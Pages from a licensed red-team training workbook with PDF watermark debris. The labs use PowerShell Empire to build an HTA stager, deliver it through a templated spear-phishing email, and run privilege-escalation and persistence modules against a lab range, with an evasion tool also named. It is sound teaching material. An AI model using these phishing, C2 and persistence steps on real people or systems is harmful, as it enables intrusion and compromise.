ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live  

  Then click Allow:   

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-10

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268   7. On your Linux VM, in the Empire terminal, you should see an indication that your listener has received  communication from your agent, with a message of “Initial agent” followed by a pseudorandom agent  name.    Hit Enter when you get that “Initial agent” message to get your prompt back.   

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 ak

er

Hit Enter to get your prompt back  To see your active agents, type agents: 

i< an

 

 

nm

 

Lincoln Mazzei nc o

ln

M

az

ze

(Empire) > agents   You should see your one agent listed there.    

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK  

Li

ce

ns

ed

  To interact with it:    (Empire: agents) > interact [AgentName]   Use Tab‐autocomplete to help type  agent name.    Rename the session to something more descriptive. Choose a name that will remind you of where the  agent is running, such as Win10:    (Empire: [AgentName]) > rename Win10  Can be any name that is easy to remember   To get information about the agent, use the “info” command. It will provide vital information about the  agent, its processname, its last check‐in time, and more. 

live

  SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-11

© SANS Institute 2020

(Empire: [SessionName]) > info  

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

er

@ ya

ho

22829180  

ak

 

i< an

nm

To see what commands are available or for help, use the “?” or “help” command:    (Empire: [SessionName]) > ?   To see that our agent is active and communicating back with our listener every 5 seconds +‐ 2.5 seconds  (0.5 Jitter), go back to the agents console and use the “list” command multiple times in one minute:    (Empire: [SessionName]) > back

nc o

ln

M

az

ze

Lincoln Mazzei

(Empire: agents) > list

ed

Wait about 7 seconds 

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

(Empire: agents) > list    

Li

You should see the beacons coming in every 3 to 7 seconds from your Windows VM. 

live 4 Seconds   

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-12

© SANS Institute 2020

Another method to see that the agent is calling back every 5 seconds +‐ 2.5 seconds is to use tcpdump.  Open another terminal run:    $ sudo tcpdump -i eth0 host 10.0.0.W and tcp[13] = 0x02  Your Windows IP    If you are a remote student using OpenVPN:    $ sudo tcpdump -i tap0 host 10.0.0.W and tcp[13] = 0x02  Your Windows IP 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Output will show the time, see the seconds field and how it changes to not be a perfect pattern:   

Ap ril

[email protected] o.

co

m

>

          Leave Empire open as this Listener and Agent will be used for the next labs. You may simply suspend your  virtual machines.   

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-13

Bonus 

© SANS Institute 2020

  Create various stager payloads with Empire and test them against your Windows VM using the same process  from Steps 4‐6.    Use the “usestager” command as you did in the previous section but choose a different one,   will show you all options:    (Empire: listeners) > usestager   Type a space after the command and hit Tab‐Tab   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180  

nm

ak

er

  Document which ones work well on your Windows VM. 

i< an

  Enhance the chance of successful execution by researching how to execute HTA without setting off endpoint  or network security solutions.  

ze

Lincoln Mazzei M

az

Look into Demiguise: http://www.github.com/nccgroup/demiguise 

nc o

ln

From the GitHub project site: The aim of this project is to generate .html files that contain an encrypted  HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted  dynamically within the browser and pushed directly to the user. This is an evasion technique to get round  content / file‐type inspection implemented by some security‐appliances. This tool is not designed to create  awesome HTA content. There are many other tools/techniques that can help you with that. What it might  help you with is getting your HTA into an environment in the first place, and (if you use environmental  keying) to avoid it being sandboxed. 

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

  Leave Empire open as this Listener and Agent(s) will be used for the next labs. You may simply suspend your  virtual machines. 

live

Conclusion  In this lab, you reviewed the OpSec features of Empire and configured a listener accordingly. The listener was  tested by creating a stager payload and executing it on your Windows VM. This is a test the Red Team should  always run to ensure successful initial access to the target environment. Beacon behavior was observed with  the use of beacon delay and jitter being configured. Lastly, other payloads may have been generated for  testing the listener and completing the preparation steps before initial access attempts.  SEC564 - © 2019 Jorge Orchilles

Lab 1.4: C2 and Weaponization

Licensed To: Lincoln Mazzei April 26, 2020

1.4-14

© SANS Institute 2020

Lab 2.1: Delivery and Initial Access Objectives 

090aff33bcb6e401ded410120bc9a268   

Deliver the stager payload via spear phishing email  Execute code on target system  Gain Initial Access to SEC564 Target 

26 ,2 02 0

  This lab will focus on the Testing Phase of a Red Team Adversary Emulation Exercise, where you will gain Initial  Access to the SEC564 Target environment. This lab builds on the previous labs. Delivery of the stager payload  will be through spear phishing email leveraging the social engineering plan you came up with. Threat  Intelligence states to send an attachment of an HTA file. Good luck! 

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 Threat  Closure i< an

nm

ak

er

Intelligence

nc o

ln

M

az

ze

Lincoln Mazzei Testing Planning To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

 

Li

TTPs Emulated in this Lab  T1043 – Commonly Used Port: Port 80 and 443   T1071 – Standard Application Layer Protocol: HTTP and HTTPS  T1086 – PowerShell: To download files from the C2 server and run various scripts   T1132 – Data Encoding: Base64  to encode command and control traffic  T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails  T1480 – Execution Guardrails: Kill dates in payload to guardrail execution 

live

   

 

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-1

Lab Setup 

© SANS Institute 2020

  1. If Empire is running, skip this step. If Empire is not running, launch it:    $ sudo empire  

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

 

M

az

ze

Lincoln Mazzei nc o

ln

2. If your listener is running from the previous lab, skip to the next step. If not, configure a listener:     (Empire) > listeners   (Empire: listeners) > uselistener http    (Empire: listeners/http) > info

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

(Empire: listeners/http) > set KillDate 12/12/2020  Day after class is over (Empire: listeners/http) > set DefaultLostLimit 0 

live

 

(Empire: listeners/http) > set Host https://10.0.0.X:443  Your Linux IP    (Empire: listeners/http) > set CertPath /opt/empire/data/   (Empire: listeners/http) > set DefaultJitter 0.5   SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-2

© SANS Institute 2020

(Empire: listeners/http) > set StagingKey Y0urSecr3tK3y  Change  Y0urSecr3tK3y to your own unique string. Note: Empire will Base64 encode the string if it is not 32  characters, and it will show you a warning that it did so.    (Empire: listeners/http) > set BindIP 10.0.0.X  Your Linux IP

090aff33bcb6e401ded410120bc9a268 (Empire: listeners/http) > set Port 443

(Empire: listeners/http) > set StagerURI /download/ 

  

26 ,2 02 0

(Empire: listeners/http) > info

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei   (Empire: listeners/http) > execute

 

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ed

 

Li

ce

ns

(Empire: listeners/http) > back   (Empire: listeners) > list   3. If you have an HTA stager in /tmp/, skip this step. If not, create and deploy an agent with the “usestager”  command:    (Empire: listeners) > usestager windows/hta   Review the default configuration of the stager that will load the agent:    (Empire: stager/windows/hta) > info  

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-3

© SANS Institute 2020

(Empire: stager/windows/hta) > set Listener http  

(Empire: stager/windows/hta) > set OutFile /tmp/Resume.hta     (Empire: stager/windows/hta) > generate  

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Ap ril

 

 

o.

co

m

>

(Empire: stager/windows/hta) > back   4. If your SimpleHTTP Server is running on TCP port 8080, skip this step. If not, in a separate Linux terminal,  move into /tmp and serve up the stager via the SimpleHTTPServer python module, listening on TCP port  8080.    # cd /tmp

ak

nm

i< an

 

# python –m SimpleHTTPServer 8080  

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-4

© SANS Institute 2020

Lab – On Your Own 

Deliver a stager payload and obtain initial access to the SEC564 Target. If your spear phishing is convincing,  Dani will click on your link.    Ensure you follow the Threat Intelligence and emulate the TTPs for APT33/Elfin:    T1043 – Commonly Used Port: Port 80 and 443   T1071 – Standard Application Layer Protocol: HTTP and HTTPS  T1086 – PowerShell: To download files from the C2 server and run various scripts   T1132 – Data Encoding: Base64 to encode command and control traffic  T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1204 – User Execution: Malicious HTML application delivered via spear phishing emails  T1480 – Execution Guardrails: Kill dates in payload to guardrail execution      Email can be set via webmail:    https://mail.sec564target.com/    Accept the invalid digital certificate by clicking Advanced ‐> Add Exception… ‐> Confirm Security  Exception    Username: SEC564Target\Student2XX  X is your student number. Remote students use  “Student200”    Password: 0nlyforemail!   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-5

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

5. Open Firefox from your Linux VM and log in to email infrastructure:    https://mail.sec564target.com/    Accept the invalid digital certificate by clicking Advanced ‐> Add Exception… ‐> Confirm Security  Exception    Username: SEC564Target\Student2XX  X is your student number. Remote students use  “Student200”    Password: 0nlyforemail!    6. Draft a new email by clicking “New” on the top left:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

er

@ ya

ho

22829180 ak

 

nm

 

i< an

  7. Complete the new email form, ensure to add the link as a hyperlink:    To: [email protected]

az

ze

Lincoln Mazzei

Resume StudentX  X is the last octect of your IP Address

Message:

Dear Dani,    I am very interested in the position available at SEC564 Target. Please find a link to my  interactive resume. I look forward to the position and hearing from you soon.    http://10.0.0.X:8080/Resume.hta     Your Linux IP     Best Regards 

nc o

ln

M

Subject:

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK  

live

Click send: 

 

Record the time the email was sent:    SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-6

© SANS Institute 2020

    8. Once Dani reads your email and is convinced by the social engineering, she will click on the email. You will  receive callback from an agent on target system. On your Linux VM, in the Empire terminal, you should see  an indication that your listener has received communication from an agent, with a message of “Initial  agent” followed by a pseudorandom agent name.    Hit Enter when you get that “Initial agent” message to get your prompt back.   

[email protected] Hit Enter to get your prompt back 

o.

co

m

>

Record the time the agent first called back:        To see your active agents, type agents: 

 

Ap ril

 

 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

@ ya

er ak nm i< an

(Empire) > agents   You should see a new agent listed there.    

ho

22829180

 

M

az

ze

Lincoln Mazzei ln

 

nc o

  9. Interact with the agent to rename and document more information.    To interact with the agent:    (Empire: agents) > interact [AgentName]   Use Tab‐autocomplete    Rename the session to something more descriptive. Choose a name that is easy to remember:    (Empire: [AgentName]) > rename Dani

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

To get information about the agent, use the “info” command. It will provide vital information about the  agent, its process name, its last check‐in time, and more.   (Empire: [SessionName]) > info Record the process information for the agent:    SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-7

 

© SANS Institute 2020

  To see what commands are available or for help, use the “?” or “help” command:    (Empire: [SessionName]) > ?   10. Review agent.log file.     A log for each agent is stored in /opt/empire/downloads//agent.log    On a separate terminal, change directory to your agent:    # cd /opt/empire/downloads/

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected]

# cat agent.log

o.

co

m

>

    Moving forward, any commands you plan to execute in the SEC564 Target environment should be  documented. You should test any commands on your Windows agent first to see what it will do and what  indicators and/or artifacts it may leave behind. 

ho

22829180 @ ya

 

Leave the Windows agent running as it will be used for other labs.    

i< an

nm

ak

er

 

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-8

© SANS Institute 2020

Bonus 

Explore the target system, ensuring you test everything on your Windows agent first and document each  command you execute.    Date  Time  Agent  Command  Result           

 

 

[email protected]  

 

 

Ap ril

 

o.

co

m

>

 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

@ ya

ho

22829180  

 

i< an

nm

ak

er

 

 

ze

 

 

az

 

nc o

ln

M

 

Lincoln Mazzei

 

ns

 

 

 

Li

ce

 

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live     Leave the Windows agent running as it will be used for other labs.  

SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-9

© SANS Institute 2020

Conclusion 

In this lab, you sent a spear phishing email that was executed by an end user at SEC564 Target to obtain Initial  Access. You documented the time the email was sent and when the agent made its first call back to your  listeners. This initial access will be used throughout the course, so it is important to not lose the agent. Before  executing anything on the target environment, try the same command on your Windows agent. When  executing on the target environment, document the date, time, agent, command, and result. Ensuring this  information is properly documented is critical for the Closure phase of the Red Team Exercise. Example: 

090aff33bcb6e401ded410120bc9a268 Time 

Agent 

MM/DD/YY  HH:MM:SS 

Command  Sent email 

XXXXXXXX 

Result  Successfully delievered 

26 ,2 02 0

Date 

Payload downloaded from  SimpleHTTPServer 

co

XXXXXXXX 

200 OK 

o.

MM/DD/YY  HH:MM:SS 

m

>

Ap ril

[email protected]

XXXXXXXX 

User executed command 

Agent call back 

i< an

MM/DD/YY  HH:MM:SS 

nm

ak

er

@ ya

ho

22829180

MM/DD/YY  HH:MM:SS 

nc o

ln

M

az

ze

Lincoln Mazzei XXXXXXXX 

info 

Internal IP:  Hostname:   Username:  Process ID:  Process name: 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK MM/DD/YY  HH:MM:SS 

XXXXXXXX 

 

live

 

  SEC564 - © 2019 Jorge Orchilles

Lab 2.1: Delivery and Initial Access

Licensed To: Lincoln Mazzei April 26, 2020

2.1-10

© SANS Institute 2020

Lab 2.2: Discovery, Privilege Escalation, and Persistence

090aff33bcb6e401ded410120bc9a268 Objectives 

Perform Discovery of the SEC564 Target environment  Identify Privilege Escalation opportunities  Attempt Privilege Escalation  Identify Persistence opportunities  Attempt to Gain Persistence 

26 ,2 02 0

    

[email protected] o.

co

m

>

Ap ril

  This lab will focus on the Testing Phase of a Red Team Adversary Emulation Exercise where you will perform  discovery of the target environment, privilege escalation opporuntites, and persistence opportunities. You will  attempt to escalate privilges and gain persistence within the SEC564 Target environment. Not every TTP will  work and those must be documeneted as well. This lab builds on the previous labs.  

i< an

Closure

nm

ak

er

@ ya

ho

22829180 Threat  Intelligence

nc o

ln

M

az

ze

Lincoln Mazzei Testing

Planning

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK

TTPs Emulated in this Lab       

live

 

T1053 – Scheduled Task: Created a scheduled task to execute a .vbe file  T1060 – Registry Run Keys / Startup Folder: Added DarkComet to the Startup folder   T1068 – Exploitation for Privilege Escalation: Exploit CVE‐2017‐0213  

SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-1

Lab Setup 

© SANS Institute 2020

  1. If Empire is running on your Linux VM, skip this step. If Empire is not running, launch it:    $ sudo empire 2. Ensure your agents are calling back. To see your active agents, type agents:    (Empire) > agents   You should see your agents:   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

m

>

Ap ril

[email protected]  

o.

co

  3. If your agents are not calling back (Last Seen time is yellow or red and you have verified the connection,  delay, etc), run through the previous lab (2.1) and let your instructor know if you still have trouble.       

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-2

© SANS Institute 2020

Lab – On Your Own 

  Perform discovery, privilege escalation and persistence on the target host. Answer these questions:    What antivirus is being used at SEC564 Target?    _____________________________________________________________________________________    What DNS Server is being used internally?    _____________________________________________________________________________________    What is your current privilege and UAC/Integrity level?    _____________________________________________________________________________________    What software is installed on the target system?    _____________________________________________________________________________________    What other systems were found on the target network?    _____________________________________________________________________________________    What patch level is the target system on?    _____________________________________________________________________________________    Is CVE‐2017‐0213 worth attempting? Why or why not?    _____________________________________________________________________________________    Were you able to obtain persistence? If so, how?    _____________________________________________________________________________________    Hints:    (Empire) > interact

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

(Empire: Win10) > usemodule  Type a space after the command and hit Tab‐Tab (Empire: Win10) > usemodule situational_awareness (Empire: Win10) > usemodule privesc (Empire: Win10) > usemodule persistence   SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-3

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

  4. First, you need understand what a module will do, then execute it on your own host (Windows VM), and  finally execute it on the target system. Powershell Empire modules are located in this directory:    /opt/empire/lib/modules/powershell

090aff33bcb6e401ded410120bc9a268 To view what a module does, use a text editor and open the module: 

26 ,2 02 0

root@slingshot:/opt/empire/lib/modules/powershell# gedit situational_awareness/host/antivirusproduct.py   To interact with an agent within Empire:    (Empire) > interact

>

Ap ril

[email protected] co

m

To go back to the agents prompt, use “back” command: 

o.

(Empire: Win10) > back   5. Determine the Antivirus running:    (Empire) > interact

ak

er

@ ya

ho

22829180 i< an

nm

(Empire: Win10) > usemodule situational_awareness/host/antivirusproduct   (Empire: powershell/situational_awareness/host/antivirusproduct) > info

az

ze

Lincoln Mazzei nc o

ln

M

 

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live   SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-4

© SANS Institute 2020

Record the current time and run the module: 

(Empire: powershell/situational_awareness/host/antivirusproduct) > run   You will notice the command is sent on the next check in, the results come in on the subsequent check ins.     Record the result: 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

 

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 i< an

nm

ak

er

    Go back to the main agent prompt:    (Empire: powershell/situational_awareness/host/antivirusproduct) > back

Lincoln Mazzei nc o

ln

M

az

ze

  6. Determine the DNS Server:    (Empire: Win10) > usemodule situational_awareness/host/dnsserver   (Empire: powershell/situational_awareness/host/dnsserver) > info

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

(Empire: powershell/situational_awareness/host/dnsserver) > run

Li

ce

ns

ed

Record the result    Go back to the main agent prompt:    (Empire: powershell/situational_awareness/host/dnsserver) > back   7. Determine current UAC/Integrity Level:    (Empire: Win10) > usemodule situational_awareness/host/get_uaclevel   (Empire: powershell/situational_awareness/host/get_uaclevel) > info

live

(Empire: powershell/situational_awareness/host/get_uaclevel) > run SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-5

© SANS Institute 2020

Record the result   

090aff33bcb6e401ded410120bc9a268  

26 ,2 02 0

  Go back to the main agent prompt:    (Empire: powershell/situational_awareness/host/get_uaclevel) > back

  8. Enumerate other host‐based data:    (Empire: Win10) > usemodule situational_awareness/host/winenum   (Empire: powershell/situational_awareness/host/winenum) > info

co

m

>

Ap ril

[email protected] o.

(Empire: powershell/situational_awareness/host/winenum) > run

ho

22829180 @ ya

 

er

Record the result. Note the result from this module is extensive. You may want to view the agent.log file  located at /opt/empire/downloads/ 

ak

 

i< an

nm

Go back to the main agent prompt:    (Empire: powershell/situational_awareness/host/winenum) > back

Lincoln Mazzei nc o

ln

M

az

ze

  9. Use PowerUp to find privilege escalation opportunities:    Look at various privesc modules on Empire:    (Empire: Win10) > usemodule privesc

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

Use PowerUp: 

Li

ce

ns

ed

(Empire: Win10) > usemodule privesc/powerup/allchecks   (Empire: powershell/privesc/powerup/allchecks) > info (Empire: powershell/privesc/powerup/allchecks) > run

live

 

Record the result. Note the result from this module is extensive. You may want to view the agent.log file  located at /opt/empire/downloads/    Go back to the main agent prompt:    (Empire: powershell/privesc/powerup/allchecks) > back SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-6

© SANS Institute 2020

10. Attempt privilege escalation methods. It is best to try everything on your Windows VM first. Some tips:    Look at various privesc modules on Empire:    (Empire: Win10) > usemodule privesc   Use the just Ask method: 

090aff33bcb6e401ded410120bc9a268 (Empire: Win10) > usemodule privesc/ask

26 ,2 02 0

(Empire: powershell/privesc/ask) > info

(Empire: powershell/privesc/ask) > set Listener http

[email protected] Ap ril

(Empire: powershell/privesc/ask) > run

co

m

>

Notice Empire will warn you when you run a module that is not Operational Secure (opsec safe). This  generally means the module may cause an impact that tips off the end user or defenders.

o.

[>] Module is not opsec safe, run? [y/N] y   On your Windows VM, you may see a UAC prompt depending on the privilege and UAC/Integrity level of  that user: 

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK  

ns

 

Li

ce

Click Yes if you want to obtain an elevated shell.   

live

SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-7

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

Ap ril

[email protected]

 

o.

co

m

>

  Go back to the main agent prompt:    (Empire: powershell/privesc/powerup/allchecks) > back

ho

22829180 ak

er

@ ya

Go back to the main Empire prompt:    (Empire: Win10) > back

i< an

nm

List agents:    (Empire: agents) > list

Lincoln Mazzei nc o

ln

M

az

ze

 

 

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK To :

 

Li

ce

ns

ed

Note a privileged agent has an * next to the Username.    11. Look and attempt persistence methods. Review the various persistence modules on Empire:    (Empire) > interact

live

(Empire: Win10) > usemodule persistence Note the modules with * mean that you must have administrator privileges:   

SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-8

© SANS Institute 2020 090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

  Attempt persistence with registry as Threat Intelligence provided.    If you have elevated privilege, you may use the elevated/registry*; if you do not have privilege, you will  need to use the userland/registry. The difference is the userland registry key is executed when the end  user logs in. This works well for endpoints where end users log in and work from all day. A great blogpost  on this is available here: https://www.harmj0y.net/blog/empire/nothing‐lasts‐forever‐persistence‐with‐ empire/ 

Ap ril

[email protected] o.

co

m

>

(Empire: Win10) > usemodule persistence/userland/registry   (Empire: powershell/persistence/userland/registry) > info (Empire: powershell/persistence/userland/registry) > set Listener http

@ ya

ho

22829180 i< an

nm

ak

er

(Empire: powershell/persistence/userland/registry) > set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\StudentX  X is the last  octect of your IP Address  (Empire: powershell/persistence/userland/registry) > run

Lincoln Mazzei ze

[>] Module is not opsec safe, run? [y/N] y

az

 

nc o

ln

M

Record the result.    

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

 

Li

 

Go back to the main agent prompt:    (Empire: powershell/persistence/userland/registry) > back

live

On the Windows VM, open the Registry and see what was modified:      C:\ regedit    Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-9

© SANS Institute 2020 090aff33bcb6e401ded410120bc9a268 Attempt persistence with schedule tasks as Threat Intelligence provided: 

26 ,2 02 0

(Empire: Win10) > usemodule persistence/userland/schtasks   (Empire: powershell/persistence/userland/schtasks) > info

[email protected] Ap ril

(Empire: powershell/persistence/userland/schtasks) > set Listener http

o.

co

m

>

(Empire: powershell/persistence/userland/schtasks) > set TaskName StudentX  X is the last octect of your IP Address  (Empire: powershell/persistence/userland/schtasks) > set RegPath HKCU:Software\Microsoft\Windows\CurrentVersion\StudentX  X is the last  octect of your IP Address 

er

@ ya

ho

22829180 i< an

nm

ak

(Empire: powershell/persistence/userland/schtasks) > set DailyTime 12:00  Time at the target system for daily execution (Empire: powershell/persistence/userland/schtasks) > run

Lincoln Mazzei ze

[>] Module is not opsec safe, run? [y/N] y

az

 

nc o

ln

M

Record the result.  

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK On the Windows VM, open a command prompt and use the schtasks command: 

live

C:\ schtasks | findstr Student

12. With a solid understanding of what a module does and how it performed against your Windows VM,  perform the same steps against the target systems. Make sure to record all commands sent to the host,  the time, the output, and if successful or not.      SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-10

© SANS Institute 2020

Bonus 

Explore the target system, ensuring you test everything on your Windows VM agent first and document each  command you execute.   Conclusion 

090aff33bcb6e401ded410120bc9a268 In this lab, you performed various discovery, privilege escalation, and persistence TTPs on your Windows VM  and on the target system compromised during Initial Access. You took solid notes as all of this information will  be required for Exercise Closure and for the following steps in the Adversary Emulation.  Time   

Agent   

TTP/Command   

Result   

26 ,2 02 0

Date   

 

 

 

 

 

22829180 ho

 

 

i< an

nm

ak

er

@ ya

 

o.

co

m

>

Ap ril

[email protected]

Lincoln Mazzei  

nc o

ln

M

az

ze

 

 

 

 

To :

 

 

 

Li

ce

ns

ed

 

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK  

 

live

 

  SEC564 - © 2019 Jorge Orchilles

Lab 2.2: Discovery, Privilege Escalation & Persistence

Licensed To: Lincoln Mazzei April 26, 2020

2.2-11

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

er

@ ya

ho

22829180 i< an

nm

ak

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

Lab 2.3: Defense Evasion, Credential Access, and Pivoting

090aff33bcb6e401ded410120bc9a268 Objectives 

Pivot to other systems within SEC564 Target  Access credentials from a compromised host  Attempt to evade defenses on other systems in SEC564 Target 

26 ,2 02 0

  

  This lab will focus on the Testing Phase of a Red Team Adversary Emulation Exercise where you will perform  defense evation, credential access, and pivot through the target environment. Not every TTP will work and  those must be documeneted as well. This lab builds on the previous labs.  

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 Threat  er

Closure

i< an

nm

ak

Intelligence

az

ze

Lincoln Mazzei Planning

nc o

ln

M

Testing

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

 

Li

TTPs Emulated in this Lab       

live

T1078 – Valid Accounts: Use valid accounts to move laterally  T1003 – Credential Dumping: Publicly available tools – Mimikatz    

SEC564 - © 2019 Jorge Orchilles

Lab 2.3: Defense Evasion, Credential Access & Pivoting

Licensed To: Lincoln Mazzei April 26, 2020

2.3-1

Lab Setup 

© SANS Institute 2020

  1. If Empire is running, skip this step. If Empire is not running, launch it:    $ sudo empire    2. Ensure your agents are calling back. To see your active agents, type agents:    (Empire) > agents   You should see your agents:   

26 ,2 02 0

